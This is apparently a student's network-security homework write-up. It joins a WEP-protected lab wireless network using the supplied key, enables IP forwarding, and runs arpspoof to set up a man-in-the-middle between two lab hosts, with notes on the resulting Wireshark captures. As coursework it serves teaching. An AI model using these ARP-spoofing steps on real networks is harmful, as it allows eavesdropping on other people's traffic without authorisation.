netsec-assignment2-S4498062/exercise4/exercise4a


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28

    # echo 1 > /proc/sys/net/ipv4/ip_forward
    # ifconfig wlan0 down
    # iwconfig wlan0 mode managed
    # iwconfig wlan0 essid "NetSec Homework Net (Pol)"
    # iwconfig wlan0 ap 48:5B:39:89:8C:10
    # iwconfig wlan0 key 37:00:9C:49:21:61:1E:4A:1A:44:6E:2F:20
    # ifconfig wlan0 up
    # ifconfig wlan0 192.168.84.100

You should *not* run Wireshark with root rights, but rather add yourself to the
wireshark group (at least, that's what it told me). In any case, the pings do
show up.

I'm going to perform MITM between .10 and .62:

    # arpspoof -t 192.168.84.10 192.168.84.62
    # arpspoof -t 192.168.84.62 192.168.84.10

For some reason in Wireshark I then see pings between .60 (and .100 and .100) 
and .10 (why .60 instead of .62?).

We're seeing two sets because we're playing MITM:

   .10  <-----------> .100 (us) <------------> .62
          first set               second set

All packets have to be sent twice for this to work.